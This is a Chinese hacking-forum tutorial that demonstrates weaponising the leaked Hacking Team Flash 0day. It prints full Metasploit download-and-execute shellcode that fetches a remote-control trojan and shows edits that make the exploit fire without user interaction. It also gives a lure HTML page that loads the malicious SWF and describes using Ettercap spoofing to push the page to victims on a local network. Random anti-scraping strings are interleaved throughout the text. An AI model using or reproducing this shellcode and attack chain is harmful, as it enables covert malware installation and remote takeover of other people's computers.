找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1449|回复: 0
打印 上一主题 下一主题

flash 0day之手工代码修改制作下载者实例入侵演示

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:28:55 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

. a; Q$ [3 A! {& K- t- s( F 三、flash 0day之手工代码修改制作下载者实例入侵演示 $ K+ m+ g1 l* ^3 A2 Z

# h4 o- r D' J: p' o

1 D$ ^2 L: y3 |; w7 n2 g# T 利用到的工具: 8 R2 @/ t1 F- \! l) @" _/ c2 z; `' i

0 Y$ n9 V( m3 E8 p) y3 L4 _0 X

6 S$ E) b* W- y" Z+ s4 U Msf " h9 r2 l: B9 y- e0 I

& ]6 B" c. f: x% y# `1 C

4 J2 m- u( w/ h& u8 z Ettercap 7 ]) {( j( v+ F J

+ Y% `' I1 `% r S; l( u

* s& ~- E9 i# d/ C Adobe Flash CS6 $ O+ b: q; e. v) v

/ o6 B9 G" a& l, P7 @

1 _# f8 b, J, e! n9 t2 l Hacking Team Flash 0day-可冲破Chrome沙盒-Evil0X源代码一份 ( B+ w' D& ]& M0 [( `6 K% w

# N, A# m5 G; k$ ]% c

: t2 |5 Q2 I6 u, L9 ] 下面我们就开始演示入侵,利用msf生成shellcode,首先打开msf执行use windows/download_execshow options # M8 _+ z5 ?2 s" T9 q

) G/ J2 m, [. D3 z6 L

' @! n$ y. U8 S) ^2 N 如图: 7 W* Q) m5 i" T7 b) A+ }3 Z) M

$ `5 O4 L- K- U( @9 d& V9 G2 m4 L

' o' H7 p2 \5 o* d   . `& K2 ^' t x" y+ ^; u3 E- x

- T. l0 L, U6 P: {& Z

: w! ^' v H- O6 s( H   . N/ C; x- E$ l( H0 {+ x

; M- e6 q3 s& L0 T& n. Q

$ x3 Q# C- H3 \! S" t- ~ 然后set EXE system.exe,再执行set URL,需要说明一下URL就是我们的马的下载地址,这里我们用远控马,远控配置使用不再详细说明。。。如图: $ s8 d7 C0 R! @5 d- q7 q

2 |+ h0 j+ A; j4 s5 g& i1 U1 U

6 ^# i! K+ C" p8 B9 z. r   8 A; B9 X; ]+ Y

+ q) G9 q" v7 Z4 x5 k, Q

# C0 B5 z# T; m/ n2 {0 J   , W. W( [7 Y: [ E! [! J

4 x# l/ w O8 i) ~% k7 k

- K' U$ c( a |/ R 然后执行generate -t dword生成shellcode,如下: ; W: d* L" n* U. p+ \

7 ~0 x" j4 s/ I

( H7 L. Q6 X# k) F0 p   - w; C. @1 R* i% I, L- y4 o

" t g6 U% ^4 x' `2 V6 [$ X

0 m9 w5 S0 E4 k: k" I7 K" G" f, _9 W4 m 复制代码到文本下便于我们一会编辑flash exp,如下: - k w4 }8 N; H

6 l; O- O6 I( Y5 ~8 {* P) M

3 g& W Z9 R5 k U 0x0089e8fc, 0x89600000, 0x64d231e5, 0x8b30528b, 0x528b0c52, 0x28728b14, 0x264ab70f, 0xc031ff31, 4 z+ p# d5 k1 R5 V

; H* y3 |% e+ r) ~ Q3 P6 W, W

+ j( [0 @1 r7 v! h) t- a( t: f& p, q 0x7c613cac, 0xc1202c02, 0xc7010dcf, 0x5752f0e2, 0x8b10528b, 0xd0013c42, 0x8578408b, 0x014a74c0, 1 Z; O, S# r5 L( q, I

7 H% C; A: |) f6 ?3 D) h. e

, v* Y" ~" L" l, h1 Z" E 0x488b50d0, 0x20588b18, 0x3ce3d301, 0x8b348b49, 0xff31d601, 0xc1acc031, 0xc7010dcf, 0xf475e038, " ]) \5 r% N. X9 Z2 [( ?

' r2 z0 T9 H6 H% @% E

# f: ~' S% {4 ?' {, P 0x3bf87d03, 0xe275247d, 0x24588b58, 0x8b66d301, 0x588b4b0c, 0x8bd3011c, 0xd0018b04, 0x24244489, 4 J1 t; f) Q1 d7 S' I/ W7 J/ V# h

4 Q7 j$ M% V9 T& h0 e0 j4 n

: m4 o; Q3 _* L' }- L 0x59615b5b, 0xe0ff515a, 0x8b5a5f58, 0x5d86eb12, 0x74656e68, 0x69776800, 0xe689696e, 0x774c6854, ! x4 Y9 `. i! i0 ^6 H9 [# |$ J4 _

^( A' p" Q# i) w( m

+ [5 S' v. M" x 0xd5ff0726, 0x5757ff31, 0x68565757, 0xa779563a, 0x60ebd5ff, 0x51c9315b, 0x51036a51, 0x53506a51, , ~8 s. {1 I( W9 c$ }' ?: U

& g: C( N$ I- n v* z. ^

7 R+ A+ b: i: c) T 0x89576850, 0xd5ffc69f, 0x31594feb, 0x006852d2, 0x52846032, 0x52515252, 0x55eb6850, 0xd5ff3b2e, ( X3 e* E% Q4 C" Z8 t% g& O

# n* x( Y8 Y7 N7 j! N8 d1 u

0 d8 E1 |% K3 l) z. W4 \: F 0x106ac689, 0x3380685b, 0xe0890000, 0x6a50046a, 0x7568561f, 0xff869e46, 0x57ff31d5, 0x56575757, , M1 ~% `' G* i' o: w, I9 @

& h: x5 y& s' r' G i/ |) W% C4 l

0 A# W% h. j3 Q, A 0x18062d68, 0x85d5ff7b, 0x4b1f75c0, 0x007c840f, 0xd1eb0000, 0x00008ee9, 0xfface800, 0x732fffff, , I& x& C2 ]6 H6 P: n4 H" ]$ m

- B" M: E; Z8 [1 _ M f

/ O/ M5 @3 n2 m u8 I& o( d 0x65747379, 0x78652e6d, 0x6beb0065, 0x505fc031, 0x026a026a, 0x6a026a50, 0xda685702, 0xff4fdaf6, & j! b/ C7 U0 [! Z

' q8 l3 M5 V: j0 d& P7 F

! {& I; z- U9 y 0xc03193d5, 0x0304b866, 0x8d54c429, 0x3108244c, 0x5003b4c0, 0x12685651, 0xffe28996, 0x74c085d5, 9 T; g$ J2 N7 j) J5 C- T) v

5 G9 q# ]3 W% W3 |6 C9 d' `: u

% S! f6 \* }# o9 k 0xc085582d, 0x006a1674, 0x448d5054, 0x53500c24, 0xae572d68, 0x83d5ff5b, 0xceeb04ec, 0x96c66853, 7 @5 A+ @ t; k% [, Z) n

; z6 \+ y! |' q3 J

, A6 d. b" {: F3 j( e+ G, u4 ], ?- j: H 0xd5ff5287, 0x6857006a, 0x876f8b31, 0x006ad5ff, 0xa2b5f068, 0xe8d5ff56, 0xffffff90, 0x74737973, : U! J! Z5 Z6 p5 I% l

& K J( T! `$ c9 y" y! {

, _: w1 Q( s+ z% q7 N7 C 0x652e6d65, 0xe8006578, 0xffffff08, 0x2e737378, 0x64696162, 0x6b682e6f, 0x00000000 3 [" Y& t) a# B! k3 i, q

5 Z. _7 t$ K/ g

0 z3 l% J( X/ Q0 B% b6 f9 B& M   , q) ]4 V! m/ h3 {: j' @

% j; s# ?6 V; k; p! E- l4 C Y

% U3 M1 ]' J h   % d. @: t# K- D7 t0 n# ]4 P' l

- s8 f$ A* @. i- ~* U9 D6 S

+ A" s8 O! a5 J$ z0 J 下面我们来修改flash 0day exp,需要修改三个文件,分别为: 8 u( S4 @8 T+ U) [/ B

3 _! k' p9 t1 H1 L, F3 ^' _

8 E) z; \& i- w2 x; o- {; S' z   ) r6 p$ X* V q

- {( x) v# z5 c, Z/ i/ X1 @

' p/ x* C) c1 |7 \# j0 e 先修改ShellWin32.as,部分源代码如图: 3 Y5 j+ q7 K( z; S+ `

`8 d+ L8 u- q5 M

. c/ }/ Q( q% J$ N7 W   & a7 I! y& e& g) ^9 _

2 p$ _* h* _$ U

# U* h; V. d7 d 我们需要把标记处[]中的代码改成用msf生成的代码,修改后如下: ) C# k# r3 F+ H$ ^! s# U

4 X* C6 G# `* Z6 I7 S

( v6 s8 {7 l9 m0 D" }   + R+ h7 Y- c+ c/ u! D7 D/ Q

6 M. W! s+ Y8 J* k% C

9 {- q2 s/ }7 U! S5 J b 然后保存,ShellWin64.as的修改方法如上述,不再演示,下面我们来修改myclass.as,这里需要说明一下,因为此exp生成的利用程序,不能直接自动触发flash漏洞,也就是需要点击按钮才可以,实际上在做渗透的时候需要把它搞得更完美,所以就需要修改,修改方法:搜索myclass的某个字符doc.addchild(btn);如图: + c: u: Z6 @: r; ^! y

( a5 }! v- h5 \3 K8 V9 g

3 B" A4 V; g1 g, G+ a   + [1 V$ l4 c; _' _' F @; u" G

( P9 _( h3 {2 w9 P8 ^ V* T

: o9 r1 _3 ?: Q& `( o/ q6 C' V 换行在后面加一句TryExpl();注意是l不是数字1,然后如图: - e3 [9 M3 J6 c% k5 H

( k6 q5 J* M+ |% l

# M B6 v5 U' m( p. N4 f. Q   ( c, Y/ a- j: I# Z

+ I# Y0 e& X$ q4 E4 F4 n( J

# m) _/ E1 k5 {, H% D( h   9 |: X1 e7 h0 k) ^$ T2 m

' i( I* c, V' S# j3 @

( Z; t1 \5 _8 b8 E+ o   ; o$ H7 w- q& ^) R, K# {' M% n

6 _6 u$ }. _* M$ u

! v @& t4 h" l! r \9 @7 ^ 然后点保存,下面我们来编译一下,打开 % p! [: l' n8 B+ Y

d$ ~: \! t D) p6 I6 X% z" h

/ ?6 A# v7 q, W) `0 { v9 d4 h% M exp1.fla然后点文件-发布,看看编译没错误 * N/ o: U* E, ~: W; ~

$ J. _" t( Q2 F$ A1 C& n& R5 f! h

1 n5 K+ @, ?5 G, i+ T2 B   * \6 d9 Q& `$ k) M' {# c

) S( A2 B" | g9 U: q

' n' v- m& M/ z( O d+ Q   " T4 ~2 i8 l- {: K! p/ Z0 f

) N4 E C- [2 G e0 w' M# G# \/ P

6 e R \1 b1 t( K# Z' z   & @2 U; ~. i- M( \

2 H- E+ r0 p( C

! g* ~( h0 o) \; V   , J* h$ E" k- Y% ~5 d9 _, `" c

1 h: Z, P1 q, Z8 w) p% d

; y9 l- b6 [; O- h, L 然后我们把生成的 7 D5 x8 ?$ L: G: [# t6 U

, z6 ]8 N/ V+ e% e) k

4 }- @; h" U$ X1 M exp1.swf丢到kailinux /var/www/html下: $ p: Y0 ?5 s# N" v, B/ J3 j0 Q

9 o% @3 ]. b9 u0 \; Y5 H

0 c0 U5 ]5 {9 U$ _5 {0 j 然后把这段代码好好编辑一下 : A h2 L& K, G+ A% ]! n

& y9 }3 j/ A. ]3 Q

6 B" Q3 e" w7 @, c: }   7 h7 ?# t2 i& `1 T$ V! G

+ i# l6 B% K4 z) G& g

1 O/ P5 Y6 t5 H( x; @   + h- [+ _: @) _6 y- O5 {2 p2 ]

+ ]1 c; `% Z0 ]) {, w. ^- n& c3 u

" c1 S- D4 O) A5 Q* w; i   & x C2 M4 l8 L, \

+ ?- A! B# s- B

+ d0 H# p! {6 n2 D; ], I5 q   " z, C8 R# ^ M4 P# _9 |0 ?! W _

2 P# V8 y9 a* U

. }5 w* g- C3 W' | u, f: r8 \   " s4 r4 [1 N( h7 L

: N- l# E H- ~

( |0 c: C2 ?& u9 X0 F   5 x1 Y7 k/ a2 h$ {, Z- N! N R9 P

+ w. Z! F6 y) p L; A

: ?/ Z" W" v: L. r" ~+ a <!DOCTYPE html> 2 i6 Y7 k6 B& e" e

6 x2 \- c3 j5 c& I& V2 b! I6 P+ [

# j# a8 z+ m; n! b: z <html> . s3 u5 Y* V1 l' D

: b/ R0 o( B6 f

5 F+ J4 M4 E$ ?' y& H ` <head> 4 D6 g4 e2 Y! j$ t3 m- N6 `

( j& }% |1 }# A# V _3 P! T

9 s1 z- z, Q% E7 D0 L4 d+ o <meta http-equiv="Content-Type" content="text/html; - `# k; ^4 d' V( l5 @

( A/ Z: Y0 c: e- j

( v; \5 g8 C( t0 C5 h charset=utf-8"/> & [, v! r$ Z- e- T

, `1 e5 J, M. c

" ]: B( A3 E( ?4 ]' T5 N+ { </head> ! T6 w) K2 L- Q) t1 ?1 M

/ Z3 d/ z. K% w9 C

$ D. h- h# [$ ~( |; a4 A& ]" ` <body> $ O( J/ l" p9 f: X

. _8 `$ E9 P& M- Y

7 m* m' K- {; e2 R6 ]$ l2 A <h2> Please wait, the requested page is loading...</h2> . o7 t% k4 z# m( s! s6 z" ~8 h$ P) I

q; U- m! _2 t4 [8 |$ {; z3 ^

8 B1 n+ j6 w! |( p <br> ' N+ l: L9 q( {

5 q* c: q) R' w

; N) i: s+ e! x <OBJECT 4 y4 b" ~" K$ v# G+ r/ R

6 ]( B7 y: K/ D* V

3 e: T* E5 O3 X1 W& d classid="clsid27CDB6E-AE6D-11cf-96B8-444553540000"  WIDTH="50" HEIGHT="50" id="4"><ARAM NAME=movie 5 S" w4 l# v5 I

7 p7 T- a% t9 a

3 Y; F$ U/ B5 E+ }" y$ C2 D# R Q) F VALUE="http://192.168.0.109/exp1.swf"></OBJECT> : w* d' P; q" | V t

- ~7 z5 [+ @, ?

5 C, a4 V" V$ q' c </body> + C8 E) M0 B+ g( C/ X! ^4 A- K9 }

8 j3 X* w8 _' M

" f! V) ?! o: r; `# Z <script> 2 q! Y! E5 |6 U Q* f3 r

4 i3 I/ w ^% u0 w* ?8 _

' R% S( m: A# y/ w, v$ e; f$ f% E6 p     setTimeout(function () { 2 ]3 i1 x. w6 `( i! F

. H6 G% P, u( Y ]8 @' k! a

8 h6 ^; x z2 O3 R) ^1 \! X          & G+ R+ ? M6 m' w) d

. B* [ ?! n, e, i# J

3 g) i/ h6 a2 k5 D2 [8 l0 q window.location.reload(); & J! {% \* s1 \2 v- U: f! P% |

1 @! Y* t+ a* e. T- ?

( p7 s* j! E, w+ _0 s [' C, U- x     }, 10000); 5 Z# ~5 F0 c+ N' G

* h% H! f0 S# I, Q- U% {

- c1 u$ i8 X" n! H0 Q. ^% u   ; i' V: D' Q8 \- ~4 b8 Z3 p- I5 [

$ P- }8 d+ l+ R/ p" p

Q9 f# k9 o$ _ ^9 T: i1 y </script> 7 z. K$ p' h% p# P3 D

" F/ p c8 ?; {( j# F

% \& x4 b* b& W" w </html> 5 S! a- i7 C. E& v, U3 E6 _

+ T2 w, b8 z; [& I0 J+ A; ~

3 Q2 v. [3 F# U   ! W! X1 s. o0 [7 i

6 E% k x3 K% e- m+ A

! r h2 X- d. c" C2 h 注意:192.168.0.109kaliip地址,这时候我们需要service apache2 start启动一下web服务,然后将上面的html保存为index.htm同样丢到kali web目录下,测试访问链接存在如图: ) F: F4 _, s$ ?5 n

- U$ v% C3 a8 G1 {* k/ d

: p" J+ ?) A9 Q2 T   . T6 r" W+ w! U( i% K6 m/ b$ s+ N

% l2 W( u' ~; h

% Y. q- m% g0 d   ! O; T: T( ]* R- Q3 W1 l

3 J# [4 Y, Q1 ]' c( G$ u. y

: V, e" @2 q3 M   t4 {6 F: K$ f' Z) u( [, N

6 b* f5 W# n! }" l

1 u% C9 Q" H* ? B$ f- ^) O4 k9 ]   6 H" O- w3 u4 E& l9 ~( @ C

0 B# F: P5 w+ M, Q

' _# {' _7 p0 Q   4 I6 j% t3 O9 ~: h( n. ]' ^& E# y

2 B8 Q; P* O2 S% u, _- c

, U7 x, t- @; l3 \ 下面我们用ettercap欺骗如图: . u+ ^ a4 l) P, K/ g/ C

& s. _- n0 S5 g3 M- h6 t& h: B

, Q9 o( `1 g8 N3 d6 u) b$ L U! w   ' U3 S% L& y) U/ X/ n

2 O6 ~* R8 Y# E* s0 f; X F6 N$ f$ c

, h& T6 o6 s" l3 D+ p2 B   ! Z. x$ M5 f8 E1 w0 Z

( d* Y4 V9 T/ J( z. U& e0 j' G+ B5 k

+ d7 P% Y2 G* y6 d 下面我们随便访问个网站看看: & a2 k, T9 B4 O* i& a! {+ j

3 e) \6 ~9 n% M% J: G* {) W

' L" [* i$ z$ R; f v* r8 c 我靠我发现直接用ettercap欺骗物理机装了腾讯管家照样可以欺骗成功,如图: 9 C) \ u! F0 q6 |* Y8 G, k

/ W+ M. w, |9 n

# @' J0 `/ E1 P) `1 K   # V, p" D9 Z0 e1 P

' R0 m; `7 u% _- J* r9 x5 b9 P

4 i- d9 Z O2 R 我们看另一台, ) o6 S& \# U: C' `- t$ L

$ @& j$ {" V6 ~

. X+ Y& G$ b0 E$ z2 x( Z5 U 提示这个错误,说明木马是成功被下载执行了,只是由于某些原因没上线而已。。。 - N( y9 Z$ |! ^2 s- d, N/ q1 G- h

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表